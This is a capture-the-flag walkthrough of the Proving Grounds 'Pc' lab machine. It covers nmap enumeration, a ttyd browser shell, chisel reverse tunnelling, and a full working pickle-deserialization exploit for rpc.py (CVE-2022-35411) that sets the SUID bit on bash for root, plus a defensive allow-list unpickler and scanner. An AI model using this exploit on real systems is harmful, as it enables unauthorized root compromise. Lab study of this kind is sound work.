In this walkthrough, we will be going through the Pc room from Proving Grounds. This room is rated Intermediate on the platform. Initial access comes from a browser terminal exposed on port 8000, and privilege escalation requires exploiting rpc.py via CVE-2022-35411 to get root on the target. So, let’s get started without any delay.
Machine Info:
| Field | Value |
| --- | --- |
| Title | Pc |
| IP address | 192.168.169.210 |
| Difficulty | Intermediate |
| OS | Linux |
| Description | Pc is an Intermediate Linux machine. Initial access comes from a browser terminal exposed on port 8000, and privilege escalation requires exploiting rpc.py via CVE-2022-35411 to get root on the target. |
Enumeration:
- I started off with my regular aggressive nmap scan and found only two ports open: 22 (SSH) and 8000 (HTTP).
```
$ sudo nmap -A 192.168.169.210
Nmap scan report for 192.168.169.210
Host is up (0.26s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE  VERSION
22/tcp   open     ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:8.2p1:
|       CVE-2020-15778                        6.8   https://vulners.com/cve/CVE-2020-15778
|       C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3  6.8   https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3  *EXPLOIT*
|       10213DBE-F683-58BB-B6D3-353173626207  6.8   https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207  *EXPLOIT*
|       PRION:CVE-2020-12062                  5.0   https://vulners.com/prion/PRION:CVE-2020-12062
|       PRION:CVE-2016-20012                  5.0   https://vulners.com/prion/PRION:CVE-2016-20012
|       CVE-2020-12062                        5.0   https://vulners.com/cve/CVE-2020-12062
|       PRION:CVE-2021-28041                  4.6   https://vulners.com/prion/PRION:CVE-2021-28041
|       CVE-2021-28041                        4.6   https://vulners.com/cve/CVE-2021-28041
|       PRION:CVE-2020-15778                  4.4   https://vulners.com/prion/PRION:CVE-2020-15778
|       CVE-2021-41617                        4.4   https://vulners.com/cve/CVE-2021-41617
|       PRION:CVE-2020-14145                  4.3   https://vulners.com/prion/PRION:CVE-2020-14145
|       CVE-2020-14145                        4.3   https://vulners.com/cve/CVE-2020-14145
|       CVE-2016-20012                        4.3   https://vulners.com/cve/CVE-2016-20012
|       PRION:CVE-2021-41617                  3.5   https://vulners.com/prion/PRION:CVE-2021-41617
|       PRION:CVE-2021-36368                  2.6   https://vulners.com/prion/PRION:CVE-2021-36368
|_      CVE-2021-36368                        2.6   https://vulners.com/cve/CVE-2021-36368
53/tcp   filtered domain
8000/tcp open     http-alt ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 Not Found
|     server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|     content-type: text/html
|     content-length: 173
|     <html><head><meta charset=utf-8 http-equiv="Content-Language" content="en"/><link rel="stylesheet" type="text/css" href="/error.css"/></head><body><h1>404</h1></body></html>
|   GetRequest:
|     HTTP/1.0 200 OK
|     server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|     content-type: text/html
|     content-length: 677047
|     <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>ttyd - Terminal</title><link rel="icon" type="image/png" href="data:image/png;base64,...
|   Socks5, X11Probe:
|     HTTP/1.0 403 Forbidden
|     server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|     content-type: text/html
|     content-length: 173
|_    <html><head><meta charset=utf-8 http-equiv="Content-Language" content="en"/><link rel="stylesheet" type="text/css" href="/error.css"/></head><body><h1>403</h1></body></html>
|_http-server-header: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|_http-title: ttyd - Terminal
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[service fingerprint omitted]
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
[OS fingerprint omitted]
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 995/tcp)
HOP RTT       ADDRESS
1   255.30 ms 192.168.45.1
2   255.26 ms 192.168.45.254
3   255.84 ms 192.168.251.1
4   256.04 ms 192.168.169.210

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.69 seconds
```
- Enumerated the web server on port 8000 and found a browser-based command shell (ttyd). Nice!
- Fired gobuster on the target to reveal some hidden directories but found nothing worth exploring.
```
gobuster dir -u http://192.168.169.210:8000/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
```
Initial Access:
- Next, upgraded the browser shell to a full-blown TTY reverse shell.
Privilege Escalation:
- Executed LinPEAS on the target to enumerate privilege escalation vectors. Found that a service was listening on port 65432 on the target's localhost.
- Set up port forwarding with chisel to forward the target's localhost port 65432 to my local port 65432.
```
# Attacker machine
./chisel server --reverse --port 9000

# Victim machine
./chisel client 192.168.45.164:9000 R:65432:127.0.0.1:65432
```
- Ran an nmap scan against the forwarded port. It looks like an HTTP service, but the scan gave nothing useful.
```
$ sudo nmap -A -p 65432 127.0.0.1
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-05 21:53 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000079s latency).

PORT      STATE SERVICE VERSION
65432/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, Kerberos, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|     HTTP/1.1 400 Bad Request
|     content-type: text/plain; charset=utf-8
|     Connection: close
|     Invalid HTTP request received.
|   GetRequest, HTTPOptions:
|     HTTP/1.1 405 Method Not Allowed
|     date: Mon, 05 Feb 2024 16:23:35 GMT
|     server: uvicorn
|     content-type: text/plain; charset=utf-8
|_    Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[service fingerprint omitted]
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 0 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.28 seconds
```
- At this point, I was looking for other privilege escalation vectors. On looking closely at the running process list, I found that a Python script, rpc.py, was running as root.
- Peeking into the Python script revealed that it listens on port 65432.
CVE-2022-35411
- Looked online for known exploits related to rpc.py and found an RCE exploit.
Exploit: https://github.com/ehtec/rpcpy-exploit/blob/main/rpcpy-exploit.py
- Changed the payload in the exploit script. The complete script is given below; the payload sets the SUID bit on the bash binary, which in turn gives us a shell back as root.
```python
import requests
import pickle

HOST = "127.0.0.1:65432"
URL = f"http://{HOST}/sayhi"
# This header makes rpc.py unpickle the request body.
HEADERS = {"serializer": "pickle"}


def generate_payload(cmd):
    # __reduce__ tells the unpickler to call os.system(cmd) while loading.
    class PickleRce(object):
        def __reduce__(self):
            import os
            return os.system, (cmd,)

    payload = pickle.dumps(PickleRce())
    print(payload)
    return payload


def exec_command(cmd):
    payload = generate_payload(cmd)
    requests.post(url=URL, data=payload, headers=HEADERS)


def main():
    exec_command('id;chmod u+s /bin/bash')


if __name__ == "__main__":
    main()
```
- Got the root shell. Captured the flag and marked the machine as complete.
```
user@pc:/home/user$ python3 expl.py
b'\x80\x04\x951\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x16id;chmod u+s /bin/bash\x94\x85\x94R\x94.'
user@pc:/home/user$ ls -alh /bin/bash
-rwsr-xr-x 1 root root 1.2M Apr 18  2022 /bin/bash
user@pc:/home/user$ /bin/bash -p -i
bash-5.0# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)
bash-5.0#
```
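The root cause behind this payload is that rpc.py unpickles the request body whenever the client sets the `serializer: pickle` header, and a pickle may name any importable global (here `posix.system`). The block below is an added example, not code from the walkthrough or from the rpcpy-exploit repository: it shows the allow-list `Unpickler` that closes this bug class, plus a static `pickletools` scan a defender can run over a captured request body without ever loading it. All function names, the `SAFE_GLOBALS` contents and both sample payloads are my own constructed assumptions.

```python
import io
import pickle
import pickletools
import struct

# rpc.py (CVE-2022-35411) unpickled any request body sent with "serializer: pickle";
# the fix is an allow-list of globals (hypothetical here; adjust per service).
SAFE_GLOBALS = {("builtins", "set"), ("builtins", "frozenset")}

class RestrictedUnpickler(pickle.Unpickler):
    """Replacement for pickle.loads that blocks arbitrary imports such as posix.system."""
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def rejects_payload(data: bytes) -> bool:
    """True when the restricted loader refuses the pickle; nothing in it is executed."""
    try:
        restricted_loads(data)
        return False
    except pickle.UnpicklingError:
        return True

def scan_globals(data: bytes):
    """List the (module, name) pairs a pickle would import, without loading it. Tracks
    GLOBAL and STACK_GLOBAL (the two strings pushed just before it, as protocol 4 emits)."""
    pushed, found = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE", "STRING",
                       "SHORT_BINSTRING", "BINSTRING"):
            pushed.append(arg)
        elif op.name == "GLOBAL":
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":
            found.append((pushed[-2], pushed[-1]))
    return found

# Constructed samples. The malicious one mirrors the opcode sequence of the page's
# captured payload (posix.system via STACK_GLOBAL, then REDUCE) with the command "id".
_frame = b"\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x02id\x94\x85\x94R\x94."
MALICIOUS_PAYLOAD = b"\x80\x04\x95" + struct.pack("<Q", len(_frame)) + _frame
BENIGN_PAYLOAD = pickle.dumps({"name": "pc"})  # an ordinary request body

if __name__ == "__main__":
    print(scan_globals(MALICIOUS_PAYLOAD), rejects_payload(MALICIOUS_PAYLOAD))
    print(scan_globals(BENIGN_PAYLOAD), restricted_loads(BENIGN_PAYLOAD))
```

The static scan is the detection side (run it over captured bodies posted with the pickle header) and the restricted loader is the fix; a service that can avoid pickle altogether and accept JSON only is better still.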
Conclusion:
So that was “Pc” for you. We started off with a regular nmap scan and found two ports open – 22 (SSH) and 8000 (HTTP). Enumerated the web server on port 8000, found terminal access via the browser, and used it to get initial access on the target. For privilege escalation, we exploited rpc.py via CVE-2022-35411 to get root on the target. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.